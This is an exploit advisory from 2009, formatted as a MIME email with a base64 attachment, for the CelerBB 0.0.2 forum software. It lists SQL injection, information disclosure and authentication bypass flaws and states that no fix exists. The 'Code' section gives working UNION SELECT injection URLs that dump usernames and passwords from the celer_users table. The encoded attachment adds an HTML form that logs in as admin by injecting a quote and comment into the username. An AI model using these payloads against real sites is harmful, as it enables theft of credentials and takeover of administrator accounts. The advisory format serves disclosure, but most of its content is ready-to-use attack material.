--001636c59672d0b3940464601c3f
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
******* Salvatore "drosophila" Fresta *******
[+] Application: CelerBB
[+] Version: 0.0.2
[+] Website: http://celerbb.sourceforge.net/
[+] Bugs: [A] Multiple SQL Injection
[B] Information Disclosure
[C] Authenticaion Bypass
[+] Exploitation: Remote
[+] Date: 05 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Multiple SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: viewforum.php, viewtopic.php
This bug allows a guest to view username and
password list.
- [B] Information Disclosure
[-] Requisites: none
[-] File affected: showme.php
This bug allows a guest to view reserved
information of any user.
- [C] Authentication Bypass
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php
This bug allows a guest to bypass authentication.
*************************************************
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT
1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM
celer_users%23
http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT
1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL
FROM celer_users%23
- [B] Information Disclosure
http://www.site.com/path/showme.php?user=admin
- [C] Authentication Bypass
CelerBB 0.0.2 Authentication Bypass Exploit
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
--001636c59672d0b3940464601c3f
Content-Type: text/plain; charset=US-ASCII;
name="CelerBB 0.0.2 Multiple Vulnerabilities-05032009.txt"
Content-Disposition: attachment;
filename="CelerBB 0.0.2 Multiple Vulnerabilities-05032009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_frxjjqnq0
KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBDZWxlckJCClsrXSBWZXJzaW9uOiAwLjAuMgpbK10gV2Vic2l0ZTogaHR0cDov
L2NlbGVyYmIuc291cmNlZm9yZ2UubmV0LwoKWytdIEJ1Z3M6IFtBXSBNdWx0aXBsZSBTUUwgSW5q
ZWN0aW9uCiAgICAgICAgICBbQl0gSW5mb3JtYXRpb24gRGlzY2xvc3VyZQogICAgICAgICAgW0Nd
IEF1dGhlbnRpY2Fpb24gQnlwYXNzCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERhdGU6
IDA1IE1hciAyMDA5CgpbK10gRGlzY292ZXJlZCBieTogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBG
cmVzdGEKWytdIEF1dGhvcjogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIENvbnRh
Y3Q6IGUtbWFpbDogZHJvc29waGlsYXh4eEBnbWFpbC5jb20KCgoqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gTWVudQoKMSkgQnVncwoyKSBDb2Rl
CjMpIEZpeAoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioKClsrXSBCdWdzCgoKLSBbQV0gTXVsdGlwbGUgU1FMIEluamVjdGlvbgoKWy1dIFJlcXVpc2l0
ZXM6IG1hZ2ljX3F1b3Rlc19ncGMgPSBvZmYKWy1dIEZpbGUgYWZmZWN0ZWQ6IHZpZXdmb3J1bS5w
aHAsIHZpZXd0b3BpYy5waHAKClRoaXMgYnVnIGFsbG93cyBhIGd1ZXN0IHRvIHZpZXcgdXNlcm5h
bWUgYW5kCnBhc3N3b3JkIGxpc3QuCgoKLSBbQl0gSW5mb3JtYXRpb24gRGlzY2xvc3VyZQoKWy1d
IFJlcXVpc2l0ZXM6IG5vbmUKWy1dIEZpbGUgYWZmZWN0ZWQ6IHNob3dtZS5waHAKClRoaXMgYnVn
IGFsbG93cyBhIGd1ZXN0IHRvIHZpZXcgcmVzZXJ2ZWQKaW5mb3JtYXRpb24gb2YgYW55IHVzZXIu
CgoKLSBbQ10gQXV0aGVudGljYXRpb24gQnlwYXNzCgpbLV0gUmVxdWlzaXRlczogbWFnaWNfcXVv
dGVzX2dwYyA9IG9mZgpbLV0gRmlsZSBhZmZlY3RlZDogbG9naW4ucGhwCgpUaGlzIGJ1ZyBhbGxv
d3MgYSBndWVzdCB0byBieXBhc3MgYXV0aGVudGljYXRpb24uCgoKKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIENvZGUKCgotIFtBXSBNdWx0aXBs
ZSBTUUwgSW5qZWN0aW9uCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvdmlld2ZvcnVtLnBocD9p
ZD0tMScgVU5JT04gQUxMIFNFTEVDVCAxLDIsR1JPVVBfQ09OQ0FUKENPTkNBVCh1c2VybmFtZSwg
MHgzYSwgcGFzc3dvcmQpKSw0LDUsNiw3LDggRlJPTSBjZWxlcl91c2VycyUyMwoKaHR0cDovL3d3
dy5zaXRlLmNvbS9wYXRoL3ZpZXd0b3BpYy5waHA/aWQ9MScgVU5JT04gQUxMIFNFTEVDVCAxLDIs
MyxOVUxMLDUsNixHUk9VUF9DT05DQVQoQ09OQ0FUKHVzZXJuYW1lLCAweDNhLCBwYXNzd29yZCkp
LE5VTEwgRlJPTSBjZWxlcl91c2VycyUyMwoKCi0gW0JdIEluZm9ybWF0aW9uIERpc2Nsb3N1cmUK
Cmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9zaG93bWUucGhwP3VzZXI9YWRtaW4KCgotIFtDXSBB
dXRoZW50aWNhdGlvbiBCeXBhc3MKCjxodG1sPgogIDxoZWFkPgogICAgPHRpdGxlPkNlbGVyQkIg
MC4wLjIgQXV0aGVudGljYXRpb24gQnlwYXNzIEV4cGxvaXQ8L3RpdGxlPgogIDwvaGVhZD4KICA8
Ym9keT4KICAgIDxmb3JtIGFjdGlvbj0ibG9naW4ucGhwIiBtZXRob2Q9IlBPU1QiPgogICAgICA8
aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJVc2VybmFtZSIgdmFsdWU9ImFkbWluJyMiPgogICAg
ICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhwbG9pdCI+CiAgICA8L2Zvcm0+CiAgPC9i
b2R5Pgo8L2h0bWw+CgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKgoKWytdIEZpeAoKTm8gZml4LgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKio--001636c59672d0b3940464601c3f--